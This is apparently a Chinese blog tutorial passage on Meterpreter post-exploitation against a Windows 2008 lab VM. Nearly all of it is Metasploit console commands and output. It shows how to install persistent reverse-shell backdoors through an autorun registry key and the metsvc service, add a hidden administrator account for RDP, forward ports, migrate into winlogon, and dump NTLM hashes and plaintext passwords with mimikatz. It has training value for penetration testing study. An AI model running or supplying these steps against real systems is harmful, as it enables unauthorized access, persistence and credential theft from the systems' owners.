Meterpreter初探

C:\Windows\system32\cmd.exe

884   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system32\svchost.exe

924   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system32\svchost.exe

972   492   sppsvc.exe        x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system32\sppsvc.exe

976   492   spoolsv.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system32\spoolsv.exe

1056  492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:\Windows\system32\svchost.exe

1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\Program Files\VMware\VMware Toolsvmtoolsd.exe

1332  492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system32\svchost.exe

1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\Program Files\VMware\VMware Toolsvmtoolsd.exe

1560  492   dllhost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system32\dllhost.exe

1640  492   msdtc.exe         x86_64  0           NT AUTHORITYNETWORK SERVICE   C:\Windows\system32\msdtc.exe

1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\Windows\system32\taskhost.exe

2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\Windows\system32\Dwm.exe

2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCEAdministrator  C:\Windows\Explorer.EXE

2312  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system32\svchost.exe

2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\Microsoft.NETFramework64v2.0.50727\mscorsvw.exe

2588  492   mscorsvw.exe      x86     0           NT AUTHORITYSYSTEM            C:\Windows\Microsoft.NETFrameworkv2.0.50727\mscorsvw.exe

2972  492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:\Windows\system32\svchost.exe

如上所示file.exe进程已经没了。需要注意的是如果存在杀软的话可能会阻止进程注入
(2).测试是不是虚拟机

 

 

 

 

 

 

Default

 

meterpreter > run post/windows/gather/checkvm [*] Checking if WIN-K30V5SI0PCE is a Virtual Machine ..... [*] This is a VMware Virtual Machine meterpreter >

1 2 3 4 5

meterpreter > run post/windows/gather/checkvm   [*] Checking if WIN-K30V5SI0PCE is a Virtual Machine ..... [*] This is a VMware Virtual Machine meterpreter >

我的2008是装在VMWare上的
(3).安装后门
方法一:persistence方法

 

 

 

 

 

 

Default

 

meterpreter > run persistence -h Meterpreter Script for creating a persistent backdoor on a target host. OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -L <opt> Location in target host where to write payload to, if none %TEMP% will be used. -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T <opt> Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i <opt> The interval in seconds between each connection attempt -p <opt> The port on the remote host where Metasploit is listening -r <opt> The IP of the system running Metasploit listening for the connect back meterpreter >

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

meterpreter > run  persistence -h Meterpreter Script for creating a persistent backdoor on a target host.   OPTIONS:       -A        Automatically start a matching multi/handler to connect to the agent     -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.     -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.     -S        Automatically start the agent on boot as a service (with SYSTEM privileges)     -T <opt>  Alternate executable template to use     -U        Automatically start the agent when the User logs on     -X        Automatically start the agent when the system boots     -h        This help menu     -i <opt>  The interval in seconds between each connection attempt     -p <opt>  The port on the remote host where Metasploit is listening     -r <opt>  The IP of the system running Metasploit listening for the connect back   meterpreter >

执行

 

 

 

 

 

 

Default

 

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241 [*] Persistent agent script is 148439 bytes long [+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [+] Agent executed with PID 2916 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ [+] Installed into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ meterpreter >

1 2 3 4 5 6 7 8 9 10 11

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241 [*] Persistent agent script is 148439 bytes long [+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs [+] Agent executed with PID 2916 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ [+] Installed into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ meterpreter >

现在退出服务器
重新配置监听器

 

 

 

 

 

 

Default

 

msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.111.129 LHOST => 192.168.111.129 msf exploit(handler) > set LPORT 2241 LPORT => 2241 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.111.129:2241 [*] Starting the payload handler... [*] Sending stage (769024 bytes) to 192.168.111.133 [*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800 meterpreter >

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.111.129 LHOST => 192.168.111.129 msf exploit(handler) > set LPORT 2241 LPORT => 2241 msf exploit(handler) > exploit   [*] Started reverse handler on 192.168.111.129:2241 [*] Starting the payload handler... [*] Sending stage (769024 bytes) to 192.168.111.133 [*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800   meterpreter >

如图，反弹成功，这个被动型的后门在某些特殊的场合会是个不错的选择
方法二:metsvc

 

 

 

 

 

 

Default

 

meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\LocalTemp\HzWbqqRpuBlxn... [*] >> Uploading metsrv.x86.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter >

1 2 3 4 5 6 7 8 9 10 11 12

meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\LocalTemp\HzWbqqRpuBlxn... [*]  >> Uploading metsrv.x86.dll... [*]  >> Uploading metsvc-server.exe... [*]  >> Uploading metsvc.exe... [*] Starting the service...      * Installing service metsvc * Starting service Service metsvc successfully installed.   meterpreter >

metsvc后门安装成功，接下来是连接

 

 

 

 

 

 

Default

 

root@Kali:~# msfconsole , , / ((__---,,,---__)) (_) O O (_)_________ _ / | o_o M S F | _____ | * ||| WW||| ||| ||| Using notepad to track pentests? Have Metasploit Pro report on hosts, services, sessions and evidence -- type 'go_pro' to launch it now. =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0] + -- --=[ 1239 exploits - 755 auxiliary - 207 post + -- --=[ 324 payloads - 31 encoders - 8 nops msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/metsvc_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set RHOST 192.168.111.133 RHOST => 192.168.111.133 msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... [*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800 meterpreter >

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

root@Kali:~# msfconsole      ,           ,     /                ((__---,,,---__))       (_) O O (_)_________           _ /            |           o_o    M S F   |                   _____  |  *                 |||   WW|||                 |||     |||   Using notepad to track pentests? Have Metasploit Pro report on hosts, services, sessions and evidence -- type 'go_pro' to launch it now.          =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0] + -- --=[ 1239 exploits - 755 auxiliary - 207 post + -- --=[ 324 payloads - 31 encoders - 8 nops   msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > show options   Module options (exploit/multi/handler):      Name  Current Setting  Required  Description    ----  ---------------  --------  -----------   Payload options (windows/metsvc_bind_tcp):      Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  process          yes       Exit technique: seh, thread, process, none    LPORT     4444             yes       The listen port    RHOST                      no        The target address   Exploit target:      Id  Name    --  ----    0   Wildcard Target   msf exploit(handler) > set RHOST 192.168.111.133 RHOST => 192.168.111.133 msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > exploit   [*] Started bind handler [*] Starting the payload handler... [*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800   meterpreter >

方法三:
这个是类似于添加账户3389远程连接

 

 

 

 

 

 

Default

 

meterpreter > run getgui -u zero -p haizeiwang123_ [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Setting user account for logon [*] Adding User: zero with Password: haizeiwang123_ [*] Hiding user from Windows Login screen [*] Adding User: zero to local group 'Remote Desktop Users' [*] Adding User: zero to local group 'Administrators' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc meterpreter >

1 2 3 4 5 6 7 8 9 10 11

meterpreter > run getgui -u zero -p haizeiwang123_ [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez carlos_perez@darkoperator.com [*] Setting user account for logon [*]     Adding User: zero with Password: haizeiwang123_ [*]     Hiding user from Windows Login screen [*]     Adding User: zero to local group 'Remote Desktop Users' [*]     Adding User: zero to local group 'Administrators' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc meterpreter >

(4).端口转发
主机处于内网也是比较常见的,metasploit自带了一个端口转发工具

 

 

 

 

 

 

Default

 

meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> The local host to listen on (optional). -h Help banner. -l <opt> The local port to listen on. -p <opt> The remote port to connect to. -r <opt> The remote host to connect to. meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133 [-] You must supply a local port, remote host, and remote port. meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133 [*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389 meterpreter >

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args]   OPTIONS:       -L <opt>  The local host to listen on (optional).     -h        Help banner.     -l <opt>  The local port to listen on.     -p <opt>  The remote port to connect to.     -r <opt>  The remote host to connect to.   meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133 [-] You must supply a local port, remote host, and remote port. meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133 [*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389 meterpreter >

接下来运行

 

 

 

 

 

 

Default

 

rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

1	rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

即可连接
(5).获取密码
法国神器mimikatz可以直接获得操作系统的明文密码,meterpreter添加了这个模块
首先加载mimikatz模块
由于我的Windows 2008是64位的，所以先要转移到64位进程

 

 

 

 

 

 

Default

 

meterpreter > ps ...... 2000 472 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32dllhost.exe 2264 1832 explorer.exe x86_64 2 WIN-K30V5SI0PCEzero C:Windowsexplorer.exe 2292 2264 vmtoolsd.exe x86_64 2 WIN-K30V5SI0PCEzero C:Program FilesVMwareVMware Toolsvmtoolsd.exe 2520 372 FfBoPtYGlNj.exe x86 1 WIN-K30V5SI0PCEAdministrator C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe 2780 2256 winlogon.exe x86_64 2 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe 3028 880 dwm.exe x86_64 2 WIN-K30V5SI0PCEzero C:WindowsSystem32dwm.exe meterpreter > migrate 2780 [*] Removing existing TCP relays... [*] Successfully stopped TCP relay on 0.0.0.0:1234 [*] 1 TCP relay(s) removed. [*] Migrating from 1428 to 2264... [*] Migration completed successfully. [*] Recreating TCP relay(s)... [*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389 meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter >

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

meterpreter > ps   ...... 2000  472   dllhost.exe        x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32dllhost.exe 2264  1832  explorer.exe       x86_64  2           WIN-K30V5SI0PCEzero           C:Windowsexplorer.exe 2292  2264  vmtoolsd.exe       x86_64  2           WIN-K30V5SI0PCEzero           C:Program FilesVMwareVMware Toolsvmtoolsd.exe 2520  372   FfBoPtYGlNj.exe    x86     1           WIN-K30V5SI0PCEAdministrator  C:UsersADMINI~1AppDataLocalTemp1rad87A98.tmpFfBoPtYGlNj.exe 2780  2256  winlogon.exe       x86_64  2           NT AUTHORITYSYSTEM            C:WindowsSystem32winlogon.exe 3028  880   dwm.exe            x86_64  2           WIN-K30V5SI0PCEzero           C:WindowsSystem32dwm.exe   meterpreter > migrate 2780 [*] Removing existing TCP relays... [*] Successfully stopped TCP relay on 0.0.0.0:1234 [*] 1 TCP relay(s) removed. [*] Migrating from 1428 to 2264... [*] Migration completed successfully. [*] Recreating TCP relay(s)... [*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389 meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter >

获取密码哈希

 

 

 

 

 

 

Default

 

meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;339062 NTLM WIN-K30V5SI0PCE Administrator lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be } 0;593431 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;593459 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;995 Negotiate NT AUTHORITY IUSR n.s. (Credentials KO) 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO) 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;47971 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials ===============   AuthID    Package    Domain           User              Password ------    -------    ------           ----              -------- 0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be } 0;593431  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;593459  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;995     Negotiate  NT AUTHORITY     IUSR              n.s. (Credentials KO) 0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO) 0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO) 0;47971   NTLM                                          n.s. (Credentials KO) 0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)

获取明文密码

 

 

 

 

 

 

Default

 

meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ 0;47971 NTLM 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;995 Negotiate NT AUTHORITY IUSR 0;339062 NTLM WIN-K30V5SI0PCE Administrator ceshimima123_ 0;593459 NTLM WIN-K30V5SI0PCE zero haizeiwang123_ 0;593431 NTLM WIN-K30V5SI0PCE zero haizeiwang123_

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ====================   AuthID    Package    Domain           User              Password ------    -------    ------           ----              -------- 0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$ 0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$ 0;47971   NTLM                                         0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     0;995     Negotiate  NT AUTHORITY     IUSR             0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     ceshimima123_ 0;593459  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_ 0;593431  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_

相关文章参考：《初探Meterpreter（一）》《再谈SMB中继攻击》